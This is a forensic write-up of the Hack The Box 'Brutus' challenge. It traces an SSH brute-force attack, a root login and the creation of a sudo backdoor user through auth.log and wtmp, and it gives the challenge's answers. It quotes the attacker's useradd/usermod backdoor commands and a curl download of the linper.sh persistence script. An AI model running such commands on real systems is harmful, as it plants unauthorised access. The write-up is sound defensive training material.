Hack the Box is a unique platform that is designed to test your hands-on abilities and also provide you with carefully crafted labs that help you improve your cyber skill set. It caters to both defense, i.e., Sherlocks, and Offense, i.e., PwntheBox
What Are Sherlocks on Hack The Box?
On the Hack The Box (HTB) platform, Sherlocks are forensic challenges that place you in the role of a digital detective. Instead of exploiting systems, you analyze evidence left behind—log files, session data, memory dumps—to piece together the story of a compromise. Think of it as reverse hacking: you follow the breadcrumbs left by attackers.
A great example of this is the Brutus Sherlock, a Linux DFIR case study that simulates an SSH brute-force attack, privilege escalation, and the creation of a backdoor user. Let’s dive into how to solve it, what we learn, and why it matters for real-world incident response.
Brutus: The Scenario
You’re given two artifacts:
auth.log: records authentication attempts.wtmp: a binary file tracking login sessions, typically read usinglastorutmpdump.
The challenge is to analyze these artifacts and answer investigative questions that reveal how an attacker breached a Linux system, escalated privileges, and maintained access.
Step-by-Step Walkthrough
1. What IP Address Was Used for the Brute Force Attack?
Begin by scanning auth.log for repeated “Failed password” and “Invalid user” messages.
You’ll quickly spot dozens of failures from the same IP within seconds:
65.2.161.68
This frequency is impossible for a human—an automated brute-force tool at work.
✅ Answer: 65.2.161.68
2. Which User Account Was Compromised?
After a flood of failed attempts, search auth.log for “Accepted password” entries. This marks a successful login.
You’ll find a successful login for:
root
This is a major red flag—root access means the attacker now controls the system.
✅ Answer: root
3. When Did the Attacker Open a Terminal Session?
auth.log shows when authentication occurred, but we want the exact terminal session start time. For this, we use the wtmp file.
Use this Python tool to decode it:
python3 utmp.py -o wtmp.out wtmp
Review wtmp.out and you’ll find the attacker logged in at:
2024-03-06 06:32:45
✅ Answer: 2024-03-06 06:32:45
4. What Was the Attacker’s Session ID?
Session IDs are logged immediately after a successful SSH login.
Search auth.log for lines like:
session opened for user root
You’ll find:
session opened for user root (uid=0) by (uid=0) with session ID 37
✅ Answer: 37
5. What Backdoor User Was Created?
To maintain persistence, attackers often create new users with elevated privileges.
Search auth.log for useradd, usermod, or groupadd.
You’ll find:
useradd cyberjunkie
usermod -aG sudo cyberjunkie
This user was granted sudo rights, giving them near-root capabilities.
✅ Answer: cyberjunkie
6. What MITRE ATT&CK Technique Was Used for Persistence?
Creating a local user account to persist access maps to:
T1136.001 – Create Account: Local Account
✅ Answer: T1136.001
7. When Did the Attacker’s First Session End?
Still in auth.logsearch for:
session closed for user root
You’ll see the session with ID 37 ended at:
2024-03-06 06:37:24
✅ Answer: 2024-03-06 06:37:24
8. What Command Did the Attacker Execute Using Sudo?
While most commands aren’t logged, those using sudo are. Look for lines showing command execution.
You’ll find:
sudo /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
The attacker downloaded a script, likely for reconnaissance or further exploitation.
✅ Answer: /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
What Is Hack The Box?
Hack The Box is a hands-on cybersecurity training platform offering virtual labs for offensive and defensive security. From ethical hacking to DFIR, HTB provides a gamified way to learn real-world skills.
It’s not just about exploiting servers. Many challenges focus on defense, like Sherlocks, which simulate breach investigations. You analyze artifacts, reconstruct timelines, and identify malicious behavior—all crucial for SOC analysts and incident responders.
Why Brutus Is a Valuable Learning Tool
The Brutus Sherlock on Hack The Box mirrors a real-world SSH brute-force scenario. You don’t just find a flag—you learn how to:
- Detect brute-force attempts from logs
- Confirm successful authentications
- Decode binary session logs
- Track attacker behavior
- Understand persistence methods
- Map actions to MITRE ATT&CK
Whether you’re a blue teamer in training or preparing for certifications like GCFA or CCFP, Brutus is an excellent exercise.
🏁 Conclusion
This forensic walkthrough of the Brutus Sherlock from Hack The Box takes you from brute-force detection to post-exploitation analysis. You traced the attack back to its source, uncovered a root compromise, and identified a backdoor user (cyberjunkie), and watched the attacker deploy a script via curl.
If you’re serious about a career in incident response, challenges like Brutus are some of the most practical training you can get.